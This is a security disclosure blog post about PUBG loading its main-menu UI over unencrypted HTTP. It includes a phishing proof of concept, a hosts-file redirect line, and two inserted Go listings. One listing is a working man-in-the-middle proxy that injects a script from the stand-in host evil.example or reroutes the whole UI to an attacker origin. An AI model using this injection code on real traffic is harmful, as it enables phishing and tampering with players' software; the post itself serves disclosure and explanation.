Update: This security hole has been plugged. See my next post for details.
Update update: There was a false-alarm report that this problem returned. Read about it here.
PlayerUnknown’s Battlegrounds (or PUBG for short) is a new, extremely popular video game. It centers on “battle royale” gameplay, pitting up to 100 players against each other in a fight to be the last one standing.
The game and its developer (Bluehole) are very ambitious, and have been wildly successful with PUBG. Despite the game not yet being officially “released”, it has topped two million concurrent players, made tens of millions of dollars, and has a burgeoning e-Sports presence. This sort of exposure and success comes with certain expectations — performance, stability, visuals, AAA-competitive marketing, etc — which have not always been met. This article is not about them; it’s about security.
First, let’s look at the very basics of the problem. What is it, how big of a deal is it, and what does it mean to you?
The PUBG main menu is a webpage loaded remotely over an unsecured HTTP connection. Anyone on the network path can therefore inject content into it, including arbitrary JavaScript with the same effect as a cross-site scripting (XSS) payload, via a man-in-the-middle (MITM) attack or any other way of tampering with HTTP responses. This means very easy and credible phishing, spying on user behavior, plus other possible attack angles.
Again, in English this time… The PUBG loading screen and the various user interface elements in its main menu are not technically part of the game you (a player) “install”. When you launch the game, they are fetched from an official server and rendered on top of the actual game (the 3D model of your character standing around). This rendering is done via a transparent “browser” that treats them as if they were an actual webpage.
The blue arrows are pointing to UI elements that are actually a “webpage”
The connection through which these elements are loaded is not secure. That means that, while the data is moving from the PUBG server to your computer, it can be intercepted and modified. In other words, someone operating any part of the connection between you and the PUBG server could manipulate the data and change what you see in your main menu, or make the main menu do things it normally would not — for example, report what in-game items you own to a third party.
That sounds serious. Why are you making this public? It is indeed serious. Normally I would not make such a big deal over a bug in an “early access” game, but as I mentioned earlier, PUBG is itself a big deal. Early access or not, this bug impacts the security of tens of millions of people. I already reported the bug to Bluehole’s support and on their forums more than two weeks ago. As it was not fixed expeditiously, and is a serious issue, I feel it is my responsibility to inform the community of the risk.
What is the actual danger to players? For a hacker to take advantage of this vulnerability, they need to either have malware already on your computer (in which case you have bigger problems) or they need to be a “middle-man” in between you and PUBG. That means that, if you are doing any of these things, you are at risk:
If a hacker does manage to take advantage of this, they can at the very least modify what you see on your screen, easily making it look like an official part of PUBG.
I even went ahead and created a proof of concept. After the animated Bluehole splash screen plays and the game music starts, you could be confronted with this:
Looks very official, right? It’s completely fake, and delivered from a server completely unrelated to PUBG or Bluehole, and could send me your login details if you input them (it does not, though).
It is also possible there are far more nefarious things for the hacker to do. I am not a security researcher and do not have enough code access to say for sure. At the very least, this security hole has been used by Xfinity to advertise inside the game itself.
What’s the next step? Short of not playing PUBG at all, there is no way for players to completely avoid this risk. To reduce it as much as you can, only play on your home network, preferably over a wired connection, or over wireless only if your router is out of range of any potential attackers. Keep in mind that this only removes local attackers; anything upstream of you, including your own ISP, can still tamper with the plain-HTTP traffic, which is exactly how the Xfinity ads mentioned above got into the game.
More importantly though, this needs to be fixed as soon as possible. Since PUBG is “being developed with community feedback” (according to its Steam page) it needs your feedback on this issue for it to be tackled in a timely fashion. Please drop a word to the developers in their forums, in a review, or on social media. With your help, PUBG’s security can be as impenetrable as this pan:
This is where we get into the technical weeds. If you’re not interested, please feel free to tune out.
I have a confession: I did not find this issue by myself. I was tipped off by a friend who pointed me to a post someone made on the PUBG forums more than six months ago, complaining that Xfinity is able to inject ads into the main menu, as they do with other insecure websites. Their shady ISP practices aside, this is a massive red flag. Shockingly, the issue was not addressed at all, and the thread ended with a resounding “meh”:
Nope, not an April 1st joke!
Being a web (-ish) developer myself, this piqued my curiosity so I dug into it.
Doing so, I found that every time the game loads, an HTTP GET request is sent to http://front.battlegroundsgame.com/index.html. Its contents?
```html
$ curl http://front.battlegroundsgame.com/index.html
<script>var url = window.location.search;url = url.replace("?", '');location.href='https://prod-live-front.playbattlegrounds.com/2017.09.14-2017.10.02-556/index-steam.2017.09.14-2017.10.02-556.html?'+url;</script>
```
My actual reaction, as those in the chatroom I was in can attest
That’s it. That’s what loads the entire UI.
Not only is it not valid HTML in the first place (a bare script tag with no document around it), and served over a completely unsecured plain HTTP connection, but bootstrapping the entire UI through a client-side JavaScript redirect would be bad practice even if those things weren’t a problem! Because the game’s embedded browser fetches this stub over HTTP, anyone who can alter that one response decides where the whole UI is loaded from.
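To make concrete what an on-path party can do with this, here is an added example in Go. It is my code, not the author’s proof of concept and not anything Bluehole ships. A small forwarding proxy fetches the plain-HTTP bootstrap above and either appends a script tag to it (the generic ISP-style injection) or rewrites the `location.href` origin so that the entire UI is loaded from an attacker host (what the author’s hosts-file demo achieves by other means). The `Bootstrap` constant is a constructed copy of the curl output above, and `evil.example` is a hypothetical attacker origin.

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"log"
	"net/http"
	"strings"
)

// Bootstrap is a constructed copy of the response the post shows for
// http://front.battlegroundsgame.com/index.html: a bare script that forwards
// the query string to the real UI. Sample input for this example, not fetched live.
const Bootstrap = `<script>var url = window.location.search;url = url.replace("?", '');location.href='https://prod-live-front.playbattlegrounds.com/2017.09.14-2017.10.02-556/index-steam.2017.09.14-2017.10.02-556.html?'+url;</script>`

// EvilOrigin is a hypothetical attacker-controlled origin (assumption for this example).
const EvilOrigin = "http://evil.example"

// InjectScript inserts payload where the rendering browser will execute it:
// before </body> if present, else before </html>, else appended to the end.
// The PUBG bootstrap has neither tag, so it takes the last path.
func InjectScript(body []byte, payload string) []byte {
	lower := bytes.ToLower(body)
	for _, closer := range []string{"</body>", "</html>"} {
		if i := bytes.LastIndex(lower, []byte(closer)); i >= 0 {
			out := make([]byte, 0, len(body)+len(payload))
			out = append(out, body[:i]...)
			out = append(out, payload...)
			return append(out, body[i:]...)
		}
	}
	return append(append([]byte{}, body...), payload...)
}

// RewriteRedirect is the targeted variant: swap the bootstrap's real UI origin
// for an attacker-controlled one, so every later UI asset is fetched from the
// attacker and nothing drawn on the main menu can be trusted.
func RewriteRedirect(body []byte, realOrigin, evilOrigin string) []byte {
	return bytes.ReplaceAll(body, []byte(realOrigin), []byte(evilOrigin))
}

// InjectingProxy stands in for an on-path party (ISP, hotspot, router) that
// forwards the client's plain-HTTP request upstream and tampers with HTML
// replies. The same code could not alter an HTTPS response without breaking
// the TLS session, which is why serving the bootstrap over HTTPS closes the hole.
type InjectingProxy struct {
	Upstream string       // base URL of the real server, e.g. "http://front.battlegroundsgame.com"
	Payload  string       // script injected into every HTML response
	Client   *http.Client // nil means http.DefaultClient
}

func (p *InjectingProxy) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	client := p.Client
	if client == nil {
		client = http.DefaultClient
	}
	resp, err := client.Get(p.Upstream + r.URL.RequestURI())
	if err != nil {
		http.Error(w, "upstream fetch failed: "+err.Error(), http.StatusBadGateway)
		return
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		http.Error(w, "upstream read failed: "+err.Error(), http.StatusBadGateway)
		return
	}
	// A stub like this one may carry no Content-Type at all; treat that as HTML too.
	ct := resp.Header.Get("Content-Type")
	if ct == "" || strings.HasPrefix(ct, "text/html") {
		body = InjectScript(body, p.Payload)
	}
	for k, vs := range resp.Header {
		if k == "Content-Length" { // length changed; let net/http recompute it
			continue
		}
		for _, v := range vs {
			w.Header().Add(k, v)
		}
	}
	w.WriteHeader(resp.StatusCode)
	_, _ = w.Write(body)
}

func main() {
	proxy := &InjectingProxy{
		Upstream: "http://front.battlegroundsgame.com",
		Payload:  `<script src="` + EvilOrigin + `/evil.js"></script>`,
	}
	fmt.Println("tampering proxy listening on :8080")
	log.Fatal(http.ListenAndServe(":8080", proxy))
}
```

Pointing the game at this proxy (for instance with the hosts-file trick described later in this post, and the proxy bound to port 80) would hand the embedded browser a bootstrap with the attacker’s script appended. `RewriteRedirect` is the more drastic option: with the origin swapped, not a single byte of the menu comes from Bluehole any more.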
Naturally, I continued down the rabbit hole by loading that URL in a browser:
Loading that URL actually loaded the PUBG UI! It also produced a wealth of information from looking at the queries themselves:
The Javascript files themselves are minified, so gleaning much from them is difficult… but not impossible. There’s some fun stuff in there:
Also, here’s some fun for social justice activists: the player objects have a default gender (male) and other physical properties, and various tokens that didn’t get minified have a weird “bro” related naming theme:
l.connection.sendMessage("UserProxyApi","InvalidateBroFriends",n)
Then, as the cherry to top it off, the console log contains confidence-inspiring lines such as:
[EGN] engine received DestoryLobbyCharacter:0 Array [ ] mock.entry.js:7:3
I don’t know what that’s about. Anyway… It looks like how I’d expect an “early access” code base to look. That unsecured HTTP request is a much bigger deal, so… Back to security talk!
Given that I know that the HTTP flaw I found can be exploited, I hastened to write a bug report to Bluehole about it. Going to their support site, I found that…
… it does not use secure communications itself, and for an authentication page, at that. That does not bode well.
I reported it anyway, and within a day I got a response from a Game Master acknowledging the report and requesting that I share it on the PUBG forums as well. The public PUBG forums. The ones where the whole world could see the problem. I did, and it seems to have gotten a similar amount of attention as the thread that got me on this track in the first place.
Given that there’s been an ample amount of time since the first mention of this issue to come up with a fix — or at least, a stopgap to not expose literally millions of players to hacking — here I am doing this write-up.
It is not just a write-up, though! For I have…
There were some screenshots of it before, but here it is in all its glory: https://github.com/fsufitch/pubg-mainmenu-hack. Update: I remembered to actually set the repository to “public” and it should actually be accessible now.
Disclaimer: this is not some of my best coding work. It’s messy and terrible, but it works. Do not code like this.
It consists of a simple Go-based server that serves an index.html file, loading a bunch of “evil” JS code that injects itself into the UI, attempting to phish the user. Of course, I am not actually saving anyone’s info, and the “login” form is a dummy, but it does provide a striking visual:
Legit or not?
This hacked UI is live and available at http://104.239.228.225/index.html. (Update: I have disabled the server since it is no longer relevant but is still costing me to keep running.) You can visit it with a web browser, or you can fool your own PUBG into loading it by adding the following line to your hosts file:

104.239.228.225 front.battlegroundsgame.com

That file is found at %SystemRoot%\System32\drivers\etc\hosts in a Windows environment. Removing the line will disable the hack.
If you really don’t feel like editing that file, I put together a simple program that does it for you. It’s super suggestively named, just like malware that could do this without your knowledge. Instead of compromising your computer though, all it does is add the hosts line, wait for you to push Enter, then remove the line.
Edit: Some comments I have received indicated that a hosts-file injection is not a “real” vulnerability, as a ton of things are vulnerable to that. While true, this hosts injection is a simple way to demo this problem, since an easy-to-apply, portable MITM demo is much harder to put together.
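As an added example (my code, not the author’s helper program from the repository), here is a Go version of the same toggle: it adds the override line to the hosts file, waits for Enter, then removes exactly that line and nothing else. The path is the one the post names; the IP is the post’s demo address, which is no longer serving anything. The functions take the file path as a parameter so they can be exercised on a scratch file without touching the real hosts file, and `AddEntry` is idempotent so running it twice cannot leave a duplicate line behind.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// DemoEntry is the override line from the post. The demo server behind this
// address has since been shut down, so the line is only useful as a sample.
const DemoEntry = "104.239.228.225 front.battlegroundsgame.com"

// HostsPath returns the Windows hosts file location the post names,
// resolving %SystemRoot% the same way the shell would.
func HostsPath() string {
	root := os.Getenv("SystemRoot")
	if root == "" {
		root = `C:\Windows`
	}
	return filepath.Join(root, "System32", "drivers", "etc", "hosts")
}

// HasEntry reports whether entry appears as its own line, ignoring surrounding
// whitespace and the \r of CRLF line endings.
func HasEntry(path, entry string) (bool, error) {
	data, err := os.ReadFile(path)
	if err != nil {
		return false, err
	}
	for _, line := range strings.Split(string(data), "\n") {
		if strings.TrimSpace(line) == entry {
			return true, nil
		}
	}
	return false, nil
}

// AddEntry appends entry on its own line; it is a no-op if already present.
// Editing the real hosts file requires an elevated (Administrator) process.
func AddEntry(path, entry string) error {
	present, err := HasEntry(path, entry)
	if err != nil || present {
		return err
	}
	data, err := os.ReadFile(path)
	if err != nil {
		return err
	}
	s := string(data)
	if len(s) > 0 && !strings.HasSuffix(s, "\n") {
		s += "\n"
	}
	s += entry + "\n"
	return os.WriteFile(path, []byte(s), 0o644)
}

// RemoveEntry deletes every line equal to entry and leaves all other lines,
// including their original line endings, untouched.
func RemoveEntry(path, entry string) error {
	data, err := os.ReadFile(path)
	if err != nil {
		return err
	}
	lines := strings.Split(string(data), "\n")
	kept := lines[:0]
	for _, line := range lines {
		if strings.TrimSpace(line) != entry {
			kept = append(kept, line)
		}
	}
	return os.WriteFile(path, []byte(strings.Join(kept, "\n")), 0o644)
}

func main() {
	path := HostsPath()
	if err := AddEntry(path, DemoEntry); err != nil {
		fmt.Println("could not edit hosts file (run as Administrator?):", err)
		os.Exit(1)
	}
	fmt.Println("Added to", path+":", DemoEntry)
	fmt.Println("Launch PUBG now; press Enter to remove the entry again.")
	_, _ = bufio.NewReader(os.Stdin).ReadString('\n')
	if err := RemoveEntry(path, DemoEntry); err != nil {
		fmt.Println("could not restore hosts file, remove the line by hand:", err)
		os.Exit(1)
	}
	fmt.Println("Entry removed; hosts file restored.")
}
```

The asymmetry between the two halves is the point the post makes about malware: adding the line is one privileged write, and nothing in the game notices that its “official” bootstrap host now resolves somewhere else.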
Video of this story as it happened
That’s the end of the PUBG security adventure… For now. Here’s hoping that Bluehole will continue improving PUBG on all fronts, stop putting users at risk, and become truly “e-Sports ready”. Thanks for reading!